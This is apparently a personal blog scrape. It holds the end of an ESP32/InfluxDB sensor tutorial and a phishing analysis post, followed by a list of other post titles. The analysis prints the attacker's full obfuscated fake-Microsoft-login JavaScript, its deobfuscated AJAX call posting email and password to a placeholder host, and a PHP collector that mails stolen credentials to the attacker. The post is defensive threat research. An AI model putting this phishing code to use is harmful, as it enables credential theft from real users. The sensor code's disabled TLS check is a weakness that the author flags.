Although Xiaomi devices are typically well built, their software is terrible. In this case, the device requires the Xiaomi Mi Home application to get the data that the sensor collects. While this was a no-go, there is a simple way to get the bindkey which allows any other Bluetooth-enabled device to get data from the sensor devices. An example is using esphome running on some ESP32. A detailed process on how to get the bindkey and collect data from the sensors is available on esphome docs, using the TelinkFlasher by ATC1441. The process is seamless, as the web app can connect to the Bluetooth device (Chromium-based browser recommended) and then use specific commands to get the key (so no wiring is needed!).

Moreover, this specific sensor has several alternative firmware available that allow one to configure (and even improve) the behavior and communication style of these sensors. Looking at the ATC_MiThermometer firmware by pvvx², adds several improvements to the device, including extended battery life (over a year), improved measurement accuracy, and extended format in 0.01 units, and adjustable RF TX Power & Bluetooth advertising interval.

The flashing process is straightforward and thoughtfully explained in the repo readme. I left my devices with the default firmware configurations, but it is possible to further adjust it. By default, the devices advertise the values they are reading using the firmware default custom format.

Note: In the case of flashing several devices, I recommend keeping track of the MAC address of the devices by connecting (inserting the battery) each one separately and checking the device MAC using, as an example, the Nordic nRF Toolbox, and write it down in the back of the sensor.

Building a Low-Power Gateway

The data can be collected from the devices easily, using ESPHome on an ESP32, as was already mentioned. A sample example of such would be using a configuration like the following:

esp32_ble_tracker:
  active: false

sensor:
  - platform: xiaomi_lywsd03mmc
    mac_address: "A4:C1:38:AA:AA:AA"
    bindkey: "eef418daf699a0c188f3bfd17e4565d9"
    temperature:
      name: "LYWSD03MMC Temperature"
    humidity:
      name: "LYWSD03MMC Humidity"
    battery_level:
      name: "LYWSD03MMC Battery Level"

However, the system becomes unstable when more than one sensor is configured at the same time, leading to several malloc failures. This also limits the ability to configure the transmission of data using MQTT or HTTP to a data storage service, so ESPHome did not work for this case.

Another option would be using OpenMQTTGateway, but using it would require an MQTT broker and some middleware (e.g., Node-RED) to consume from the MQTT topics and send the data to some database³.

Lastly, the option chosen was to program a minimal Arduino program that runs on the ESP32 that collects data from the sensor devices and, using REST, directly writes the data to a database. To fulfill all the requirements, this needed to be a cloud-based database, preferably with some kind of visualization toolkit available, so InfluxDB Cloud was selected. The free tier retains data from the last 30 days, which is more than enough to understand the thermal and isolation performance of the home⁴.

The Arduino program was built using two libraries:

By leveraging those libs, the program is less than 80 lines of code:

#include "ATC_MiThermometer.h"
#include <WiFi.h>
#include <InfluxDbClient.h>
#include <InfluxDbCloud.h>

const char *ssid = "---";
const char *password = "---";

#define TZ_INFO "WET-0WEST-1,M3.5.0/01:00:00,M10.5.0/02:00:00" // lisbon time
#define INFLUXDB_URL "https://example.influxdata.com"
#define INFLUXDB_TOKEN "base64=="
#define INFLUXDB_ORG "org"
#define INFLUXDB_BUCKET "bucket"

// List of known sensors' BLE addresses
std::vector<std::string> knownBLEAddresses = {
    "A4:C1:38:11:11:11",
    "A4:C1:38:22:22:22" };

// List of localizations
std::vector<std::string> locations = {
    "office",
    "entrance" };

InfluxDBClient client(INFLUXDB_URL, INFLUXDB_ORG, INFLUXDB_BUCKET, INFLUXDB_TOKEN);
const int scanTime = 5; // BLE scan time in seconds
ATC_MiThermometer miThermometer(knownBLEAddresses);

void setup() {
    Serial.begin(115200);
    WiFi.begin(ssid, password);
    Serial.println("Connecting");
    while (WiFi.status() != WL_CONNECTED) {
        delay(500);
        Serial.print(".");
    }
    Serial.print("Connected to WiFi network with IP Address: ");
    Serial.println(WiFi.localIP());
    timeSync(TZ_INFO, "pool.ntp.org", "time.nis.gov");
    // do not validate TLS (this should be changed)
    client.setInsecure();
    miThermometer.begin();
}

void loop() {
    // Set sensor data invalid
    miThermometer.resetData();
    // Get sensor data - run BLE scan for <scanTime>
    unsigned found = miThermometer.getData(scanTime);

    for (int i = 0; i < miThermometer.data.size(); i++) {
        if (miThermometer.data[i].valid){
            Serial.printf("Sensor %d: %s\n", i, knownBLEAddresses[i].c_str());
            Serial.printf("Location %d: %s\n", i, locations[i].c_str());
            Serial.printf("%.2f°C\n", miThermometer.data[i].temperature / 100.0);
            Serial.printf("%.2f%%\n", miThermometer.data[i].humidity / 100.0);
            Serial.printf("%.3fV\n", miThermometer.data[i].batt_voltage / 1000.0);
            Serial.printf("%d%%\n", miThermometer.data[i].batt_level);

            Point sensor("atc_mithermometer");
            if (WiFi.status() == WL_CONNECTED) {
                sensor.addTag("location", locations[i].c_str());
                sensor.addTag("mac", knownBLEAddresses[i].c_str());
                // Report RSSI of currently connected network
                sensor.addField("temperature", miThermometer.data[i].temperature / 100.0);
                sensor.addField("humidity", miThermometer.data[i].humidity / 100.0);
                sensor.addField("batt_level", miThermometer.data[i].batt_level);
                // Print what are we exactly writing
                Serial.print("Writing: ");
                Serial.println(client.pointToLineProtocol(sensor));
                if (!client.writePoint(sensor)) {
                    Serial.print("InfluxDB write failed: ");
                    Serial.println(client.getLastErrorMessage());
                }
            } else { Serial.println("WiFi Disconnected"); }
        }
    }
    // Delete results fromBLEScan buffer to release memory
    miThermometer.clearScanResults();
    delay(60000 * 10); // run each 10min
}

InfluxBD uses the line protocol as a way of writing data over HTTP into the database, including tags (here used for device location and MAC), datapoints (humidity, temperature, and battery level), and time (using NTP data).

Building a Dashboard (Final Result)

Now that we have data being collected and sent to InfluxDB is time to build a dashboard. InfluxDB has a built-in dashboard-building tool that allows data from buckets to be explored and transformed.

As data points are only being collected every 10 minutes, to have a smooth curve, we can use the interpolate function:

import "interpolate"

from(bucket: "bucket")
  |> range(start: v.timeRangeStart, stop: v.timeRangeStop)
  |> filter(fn: (r) => r["_measurement"] == "atc_mithermometer")
  |> filter(fn: (r) => r["_field"] == "temperature")
  |> interpolate.linear(every: 1m)
  |> aggregateWindow(every: v.windowPeriod, fn: last, createEmpty: false)
  |> yield(name: "last")

This gives us a view of temperature per device (tagged by location and mac address). InfluxDB also has built-in features to trigger alerts when some threshold is bypassed and to create deadman checks that trigger when some measurement has no new data for a period of time.

Next Steps

Given the 30 days retention limit of InfluxDB free tier, one solution for backing up old data could be built using some FaaS service (e.g. Cloudflare Workers). As an example, the backup serverless function could be like a cron job that runs each 30 days and downloads all the data from InfluxDB as a CSV and uploads it to some cloud data storage provider.

References

https://xkcd.com/927/ ↩
The ATC_MiThermometer firmware by pvvx supports Xiaomi Mijia (LYWSD03MMC) as well as the Xiaomi Miaomiaoce (MHO-C401), the Qingping Temp & RH Monitor (CGG1-Mijia), and the CGDK2 Qingping Temp & RH Monitor Lite. ↩
InfluxDB MQTT Native Collector has the potential to fill in this gap by requiring only a broker but no middleware, but it is a paid-tier only feature. @InfluxDB, why not a free tier? ↩
An alternative to InfluxDB would be to use the Google Sheets API to store data in sheets by making REST requests and, then, add some charts that update automatically when new lines are added. ↩

On the hook of a phisher

Sat, 30 Jul 2022 00:00:00 +0000

Phishing campaigns are standard, but they are typically poorly done and low-effort. But, sometimes, we catch a good one. This reports an analysis carried over one of those shady emails.

The Welcoming Message

The entry point for this attempt was an email message sent to one of the top-tier individuals at the target organization.

The email contained the subject “Payment_Processed_for_Inv_92994_July 26, 2022” and was sent from an gmx.net email account. The sender details did appear legit, with something similar to COMPANY_NAME | Account.

As usual, the juice is in the attachments. So we have an ATT26270.htm which, when open, presents us with the following well-crafted fake Microsoft login page:

Opening the htm file, we encounter the following code in an enormous one-liner:

<script language="javascript">
  document.write(
    unescape(
      "%0D%0A%0D%0A%0D%0A%0D%0A%...%3C/script%3E%0D%0A%0D%0A%0D%0A%0D%0A%3C/html%3E"
    )
  );
</script>

The escaped long string corresponds to the full web page, as shown above. This seems like a simple trick to bypass some of the spam filters and other protections. Looking at the code that is passed to the document.write, we can see a normal web page with some forms, which is an almost perfect rip-off of the login form of Microsoft (including the enormous b64 encoded background image), and can be seen here (gist). The curious part starts when we look at the JavaScript code that is part of the generated page.

function _0x568f(){var _0x3cc923=['indexOf','http://www.','ready','base64string==','Verifing...','toLowerCase','html','signal','Email\x20field\x20is\x20emply.!','click','val','animate','#pr','176728cVrknv','https://logo.clearbit.com/','#logo','Sign\x20in','#submit-btn','attr','src','#error','hash','keyCode','hide','keypress','62422SfXwZP','#div2','646373KPbBzm','POST','show','replace','171111TdAKpx','#dmlogo','ajax','1174710qYyGSY','log','Password\x20field\x20is\x20emply.!','#div1','which','#domain','#ai','JSON','5whiIJH','readonly','#msg','411720woBocu','1545536viIcmF',':visible','focus','substr','That\x20account\x20doesn\x27t\x20exist.\x20Enter\x20a\x20different\x20account','location','toUpperCase','#ai2'];_0x568f=function(){return _0x3cc923;};return _0x568f();}var _0x9a4e8d=_0x1daa;function _0x1daa(_0x5aed50,_0x5b0cdd){var _0x568fcf=_0x568f();return _0x1daa=function(_0x1daab1,_0x575321){_0x1daab1=_0x1daab1-0xec;var _0x358c63=_0x568fcf[_0x1daab1];return _0x358c63;},_0x1daa(_0x5aed50,_0x5b0cdd);}(function(_0x13cc03,_0x47991b){var _0xd2c8a=_0x1daa,_0x1471da=_0x13cc03();while(!![]){try{var _0x8b832f=parseInt(_0xd2c8a(0x10b))/0x1+parseInt(_0xd2c8a(0x105))/0x2+-parseInt(_0xd2c8a(0x119))/0x3+parseInt(_0xd2c8a(0xf9))/0x4*(-parseInt(_0xd2c8a(0x116))/0x5)+parseInt(_0xd2c8a(0x10e))/0x6+parseInt(_0xd2c8a(0x107))/0x7+-parseInt(_0xd2c8a(0x11a))/0x8;if(_0x8b832f===_0x47991b)break;else _0x1471da['push'](_0x1471da['shift']());}catch(_0x1e2d5e){_0x1471da['push'](_0x1471da['shift']());}}}(_0x568f,0x1c478),$(document)[_0x9a4e8d(0xee)](function(){var _0x50a638=_0x9a4e8d,_0x24c4e8=0x0;$(_0x50a638(0x111))[_0x50a638(0x103)](),$(_0x50a638(0x106))[_0x50a638(0x109)]();var _0x3fa8f1=$(_0x50a638(0x114))[_0x50a638(0xf6)]();$(_0x50a638(0x121))[_0x50a638(0xf6)](_0x3fa8f1);var _0x3fa8f1=window['location'][_0x50a638(0x101)]['substr'](0x1);if(!_0x3fa8f1){}else{var _0x362e6f=_0x3fa8f1,_0x3249d7=_0x362e6f[_0x50a638(0xec)]('@'),_0x30e092=_0x362e6f[_0x50a638(0x11d)](_0x3249d7+0x1),_0x2bdea5=_0x30e092[_0x50a638(0x11d)](0x0,_0x30e092[_0x50a638(0xec)]('.')),_0x103e1a=_0x2bdea5['toLowerCase'](),_0x79edc7=_0x2bdea5['toUpperCase']();$(_0x50a638(0x114))[_0x50a638(0xf6)](_0x362e6f),$(_0x50a638(0x106))[_0x50a638(0xf7)]({'right':0x0,'opacity':'show'},0x3e8),$(_0x50a638(0x111))[_0x50a638(0xf7)]({'right':0x0,'opacity':_0x50a638(0x103)},0x0),$(_0x50a638(0xfb))['animate']({'right':0x0,'opacity':_0x50a638(0x103)},0x0),$(_0x50a638(0xfd))[_0x50a638(0xf6)](_0x50a638(0xfc)),$('#ai2')['val'](_0x362e6f),$(_0x50a638(0x121))[_0x50a638(0xfe)](_0x50a638(0x117),!![]),$(_0x50a638(0x10c))[_0x50a638(0xfe)](_0x50a638(0xff),_0x50a638(0xfa)+_0x30e092),$(_0x50a638(0x113))['html'](_0x79edc7),$(_0x50a638(0xf8))['val'](''),$(_0x50a638(0x118))[_0x50a638(0x103)]();}$(document)[_0x50a638(0x104)](function(_0x4f805d){var _0x16a5c0=_0x50a638,_0x1308cf=_0x4f805d[_0x16a5c0(0x102)]?_0x4f805d['keyCode']:_0x4f805d[_0x16a5c0(0x112)];if(_0x1308cf=='13')return $(_0x16a5c0(0xfd))['click'](),![];});var _0x210725=_0x50a638(0xef);$(_0x50a638(0xfd))[_0x50a638(0xf5)](function(_0x43d150){var _0x4c17f4=_0x50a638;$(_0x4c17f4(0x100))['hide'](),$(_0x4c17f4(0x118))[_0x4c17f4(0x103)](),$(_0x4c17f4(0xfd))[_0x4c17f4(0xf6)](_0x4c17f4(0xfc)),_0x43d150['preventDefault']();var _0x2bd238=$(_0x4c17f4(0x114))[_0x4c17f4(0xf6)](),_0x2b4ff2=$(_0x4c17f4(0xf8))['val'](),_0x4b3e69=_0x2bd238,_0x1c24be=_0x4b3e69['indexOf']('@'),_0x4f4aee=_0x4b3e69[_0x4c17f4(0x11d)](_0x1c24be+0x1),_0x4d3692=_0x4f4aee[_0x4c17f4(0x11d)](0x0,_0x4f4aee[_0x4c17f4(0xec)]('.')),_0x138a31=_0x4d3692[_0x4c17f4(0xf1)](),_0x101d60=_0x4d3692[_0x4c17f4(0x120)](),_0x402362=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x2bd238)return $('#error')[_0x4c17f4(0x109)](),$(_0x4c17f4(0x100))[_0x4c17f4(0xf2)](_0x4c17f4(0xf4)),![];if(!_0x402362['test'](_0x4b3e69))return $(_0x4c17f4(0x100))[_0x4c17f4(0x109)](),$(_0x4c17f4(0x100))['html'](_0x4c17f4(0x11e)),![];if($(_0x4c17f4(0x106))['is'](_0x4c17f4(0x11b))){}else return $(_0x4c17f4(0x106))[_0x4c17f4(0xf7)]({'right':0x0,'opacity':_0x4c17f4(0x109)},0x3e8),$('#div1')[_0x4c17f4(0xf7)]({'right':0x0,'opacity':_0x4c17f4(0x103)},0x0),$('#logo')[_0x4c17f4(0xf7)]({'right':0x0,'opacity':'hide'},0x0),$(_0x4c17f4(0xfd))[_0x4c17f4(0xf6)](_0x4c17f4(0xfc)),$('#ai2')[_0x4c17f4(0xf6)](_0x4b3e69),$(_0x4c17f4(0x121))[_0x4c17f4(0xfe)](_0x4c17f4(0x117),!![]),$(_0x4c17f4(0x10c))['attr'](_0x4c17f4(0xff),_0x4c17f4(0xfa)+_0x4f4aee),$('#domain')[_0x4c17f4(0xf2)](_0x101d60),$(_0x4c17f4(0xf8))[_0x4c17f4(0xf6)](''),![];if(!_0x2b4ff2)return $(_0x4c17f4(0x100))[_0x4c17f4(0x109)](),$(_0x4c17f4(0x100))[_0x4c17f4(0xf2)](_0x4c17f4(0x110)),_0x2bd238[_0x4c17f4(0x11c)],![];_0x24c4e8=_0x24c4e8+0x1,$[_0x4c17f4(0x10d)]({'dataType':_0x4c17f4(0x115),'url':atob(_0x210725),'type':_0x4c17f4(0x108),'data':{'ai':_0x2bd238,'pr':_0x2b4ff2},'beforeSend':function(_0x1f826c){var _0x66df5e=_0x4c17f4;$('#submit-btn')[_0x66df5e(0xf6)](_0x66df5e(0xf0));},'success':function(_0x13e87b){var _0x29a29f=_0x4c17f4;if(_0x13e87b){$('#msg')[_0x29a29f(0x109)](),$(_0x29a29f(0xfd))[_0x29a29f(0xf6)](_0x29a29f(0xfc)),console[_0x29a29f(0x10f)](_0x13e87b);if(_0x13e87b[_0x29a29f(0xf3)]=='ok'){$(_0x29a29f(0xf8))['val']('');if(_0x24c4e8>=0x2)return _0x24c4e8=0x0,window[_0x29a29f(0x11f)][_0x29a29f(0x10a)](_0x29a29f(0xed)+_0x4f4aee),![];}else{}}},'error':function(){var _0x1a0b9a=_0x4c17f4;$(_0x1a0b9a(0xf8))['val']('');if(_0x24c4e8>=0x2)return _0x24c4e8=0x0,window['location'][_0x1a0b9a(0x10a)](_0x1a0b9a(0xed)+_0x4f4aee),![];$('#msg')['show'](),$(_0x1a0b9a(0xfd))[_0x1a0b9a(0xf6)](_0x1a0b9a(0xfc));},'complete':function(){var _0x5cb88e=_0x4c17f4;$(_0x5cb88e(0xfd))['val'](_0x5cb88e(0xfc));}});});}));

Yes, you guessed it, it’s obfuscated¹. Let’s find out what it does.

Unpacking

The first approach for deobfuscating JS for me is to use JSNice, an amazing tool by the Secure, Reliable, and Intelligent Systems Lab, Computer Science Department of the ETH Zurich. Taking the previous code and entering it into the tool gives us a more readable first version of the snippet.

However, some parts, such as the string array, still remained. After searching for some time I found out synchrony by relative, a pretty neat javascript cleaner & deobfuscator, primarily target for javascript-obfuscator tool.

The several outputs of the different tools can be seen in JSnice and synchrony. And, after some final, manual, adjustment, the readable result can be found on here.

Why the use of jQuery in 2022?…

Following the Trail

Moving on, the logic of the code/page is pretty straightforward:

The webpage is rendered;
The username field is pre-filled with the target email account (the same that received the email);
When entering input in the password field, an error of bad password is given Your account or password is incorrect. If you don’t remember your password, reset it now.
- Clicking reset it now redirect us to the same page.
When entering a second input, the js redirects us to the email address domain.
Under the hood, a JSON object is created and sent to a remote server.

Looking more carefully at the js, we can see the remains of several features that weren’t used for this concrete attack. One example of such is the use of https://logo.clearbit.com/<company_name>, a simple API that returns the logo of a company passed as a parameter.

The request code is also a simple AJAX request:

$.ajax({
    dataType: 'JSON',
    URL: "https://example.com/dwsync/def.php",
    type: 'POST',
    data: {
        ai: email_address,
        pr: password,
    },
    beforeSend: function (xhr) {
    $('#submit-btn').val('Verifing...')
    },
    success: function (arr) {
        if (arr) {
            $('#msg').show()
            $('#submit-btn').val('Sign in')
            console.log(arr)
            if (arr.signal == 'ok') {
            $('#pr').val('')
                if (attempt_counter >= 2) {
                    return (
                        (attempt_counter = 0),
                        window.location.replace('http://www.' + company_url),
                        false
                    )
                }
            }
        }
    },
    error: function () {
        $('#pr').val('')
        if (attempt_counter >= 2) {
            return (
                (attempt_counter = 0), 
                window.location.replace('http://www.' + company_url), 
                false
            )
        }
        $('#msg').show()
        $('#submit-btn').val('Sign in')
    },
    complete: function () {
        $('#submit-btn').val('Sign in')
    },
})

There is some retry loop – and that’s why we have two password attempts before redirecting the window.location call – but beyond that, we just have the AJAX request. Following the URL_target, we found a random PHP-based website (given away by the file def.php).

The Other End

Let’s look more carefully at the other end. Opening the remote address, I found a poorly-done old-designed website of a random Brazillian store. After a closer look at the website structure, we found Exposure of Information Through Directory Listing, and, even further, we find several dwsync.xml files, always inside a _notes folder. Looking for more information, we find out that:

dwsync.xml is a file created by Dreamweaver. Dreamweaver uses it to synchronize files in a Dreamweaver project.

This is a known security problem, Adobe Dreamweaver dwsync.xml Remote Information Disclosure, as listed in Nessus.

<dwsync>
    <file name="class.phpmailer.php" server="example_company_one.com.br/public_html" local="347870503" remote="-4611698281370955880" Dst="-1"/>
    <file name="classe.funcoes.php" server="example_company_one.com.br/public_html" lecal="3478705403" remote="-4611698281370955880" Dst="-1"/>
    <file name="phpmailer.rar" server="example_company_one.com.br/public_html" local="3478705408" remote="7777996696" Dst="-1"/>
    <file name="canvas.php" server="example_company_one.com.br/public_html" local="3478705403" remote="7777996696" Dst="-1"/>
    <file name="MailHandler.php" server="example_company_one.com.br/public_html" local="3478705403" remote="-4611698281370955880" Dst="-1"/>
    <file name="jquery.validate.js" server="example_company_one.com.br/public_html" local="3446821216" remote="-4611698281370955880" Dst="-1"/>
    <file name="shareCount.php" server="example_company_one.com.br/public_html" local="3478807356" remote="7777996696" Dst="-1"/>
    <file name="canvas.php" server="example_company_two.com.br/public_html" local="3515351965" remote="7810389376" Dst="-1"/>
    <file name="classe.funcoes.php" server="example_company_two.com.br/public_html" local="3515351965" remote="-4611802528784771712" Dst="-1"/>
    <file name="jquery.validate.js" server="example_company_two.com.br/public_html" local="3515351965" remote="-4611802528784771712" Dst="-1"/>
    <file name="MailHandler.php" server="example_company_two.com.br/public_html’" local="3515351965" remote="-4611802528784771712" Dst="-1"/>
    <file name="class.phpmailer.php" server="example_company_two.com.br/public_html" local="3515351965" remote="-4611802528784771712" Dst="-1"/>
    <file name="shareCount.php" server="example_company_two.com.br/public_html" local="3515351966" remote="7810389616" Dst="-1"/>
    <file name="phpmailer.rar" server="example_company_two.com.br/public_html’" local="3515351966" remote="7810389616" Dst="-1"/>
</dwsyne>

This seems to be a sync file of the company that designed the website since it stores information about several websites that do not correspond to the one in which the file was stored. Nonetheless, there are some curious files, including the phpmailer.rar. Without searching for long, I discovered that the PHPmailer in question is a boilerplate and old one, PHP Mailer by codeworxtech. The other files were simple validators and other files that are part of the PHPmailer. So, no luck on getting the def.php file. But we now know that most probably, the attacker was able to compromise this remote website, upload both the phpmailer and def.php, using it to receive the phishing payloads.

Some OSINT and Closing

When looking at the source code of the htm file, we can find some breadcrumbs such as typos and variable names that, most probably, are unique to this payload. More concretely, let us take the following hints:

Regarding the AJAX payload, we know that, typically, the object keys are hardcoded for the server to be able to parse them; in this case, the variables ai and pr.
- In PHP, given that the AJAX makes a POST request, probably the received using $_POST feature. So, most probably the def.php has, somewhere, a call to $_POST['ai'] and $_POST['pr'].
Some error messages have typos, such as Password field is empty.!

Doing some code searches on GitHub, we quickly found several possible correspondence results. Taking into account all the information that we collected so far, the most similar/supicious one was found in a GitHub account with a repository with several WordPress (PHP) malware samples: stefanpejcic/wordpress-malware, more concretely WordPress-malware/11.02.2021/.

Taking a look into the next.php file:

<?PHP
include 'email.php';
$email = trim($_POST['ai']);
$password = trim($_POST['pr']);
if($email != null && $password != null){
    $ip = getenv("REMOTE_ADDR");
    $hostname = gethostbyaddr($ip);
    $useragent = $_SERVER['HTTP_USER_AGENT'];
    $message .= "|----------| Xls |--------------|\n";
    
    $message .= "Online ID            : ".$email."\n";
    $message .= "Passcode              : ".$password."\n";
    $message .= "|--------------- I N F O | I P -------------------|\n";
    $message .= "|Client IP: ".$ip."\n";
    $message .= "|--- http://www.geoiptool.com/?IP=$ip ----\n";
    $message .= "User Agent : ".$useragent."\n";
    $message .= "|----------- fudsender(dot)com --------------|\n";
    $send = $Receive_email;
    $subject = "Login : $ip";
    mail($send, $subject, $message);   
    $signal = 'ok';
    $msg = 'InValid Credentials';
    $fp = fopen("apas.txt", "a");
    fwrite($fp,$message);
    
    // $praga=rand();
    // $praga=md5($praga);
}
else{
    $signal = 'bad';
    $msg = 'Please fill in all the fields.';
}
$data = array(
        'signal' => $signal,
        'msg' => $msg,
        'redirect_link' => $redirect,
    );
    echo json_encode($data);

?>

Here we can see the calls to $_POST, concretely, $email = trim($_POST['ai']); $password = trim($_POST['pr']);. The remaining logic is also simple and clean:

The parameters are received by POST and checked for null;
The IP of the requesting victim is obtained by the env variable REMOTE_ADDR of PHP;
The user agent is also fetched by getting HTTP_USER_AGENT;
The approximate location of the victim is discovered by requesting geoiptool;
An email $message is created with all that information, with the subject Login : $ip, and PHPmailer is used to send the email to the attacker.
In some versions of this malware, a txt file is stored as a log, but I had no luck finding such a file in this case.

So, the case is closed. As of today, the def.php appears to have been removed from the remote website (giving 404), but this can also be just a modification of the PHP script to occur as an error and make more challenging its analysis.

Looking further on GitHub, we find a lot of accounts with low activity with derivations of these payloads (try it). Seems like attackers are adopting open-source and code versioning.

References

base64string== is a dummy placeholder just to keep the destination URL hidden. ↩

João Pedro Dias

VoicePress5: Tracing a Phishing-to-Java RAT Infection Chain

Spreading the Bait

Getting the Juice

Analyzing the Package

Unpacking the Payload

The AI Tricks

Threat Landscape

Timeline

Plywood Trojan: When Attackers Go Budget

Target Acquired

The Analysis

Timeline

Footnotes

Hardware Hacking 101 Village - Post-Mortem

Get the Basics Right: Learn Electronics and Hardware Programming

Collect Target Devices

Don’t Be Afraid of Soldering

Serial Interfaces Everywhere

Logic Analyzers: Cheap Works

Multimeters: Get One, and Then Another One

Most Things Are Obvious

Fault Injection on a Budget

Software That Works

Firmware Is Right There

Radio Waves: The Invisible Attack Surface

3, 2, 1, GO!

How to Run Your Own Weather Station

The Acquisition

The BresserWeatherSensorReceive Project

Making the Station Data Accessible

How It Looks Like

Footnotes

From a NAS to a full-fledge homelab with spare parts

Ground Zero: The NAS Quest

The Plex Episode

It’s not DNS. There is a no way it’s DNS. It was DNS.

The Home Automation Adventure

The Verbatim Disk Fail

From Scratch

Smart Home Pt. II

The Finale (Current Setup)

Footnotes

Hardware Hacking and Research Toolbox Inventory

Wi-Fi, Bluetooth and other radios

Device inspection (debug tools and programmers)

Smart cards

Generic boards

Screwdrivers, Lockpick and others

Random

Footnotes

OPOSEC XMAS CTF Challenge Christmas 2022 Write-up

Trivia

Who? (100 pts)

The Great Hack (200 pts)

Crypto

Mmmm… Donuts… (100 pts)

Lets Share! (200 pts)

Web

The Folt (100 pts)

In Passwords, We Trust, and in PHP, We Believe! (200 pts)

Misc

Black Hole (100 pts)

A Programming Language (200 pts)

Find The Typo (300 pts)

Back Me UP! (400 pts)

Network

867 CFR (100 pts)

Who’s There? (200 pts)

My Network is Secure! (300 pts)

Wrap-up

Portuguese Cybersecurity Competition CTF Write-up

Strange Email

Veracruz

Shopper

Ovlo

Hidden In the Web

Talkies Talk

Bad Cookie

Distant Sounds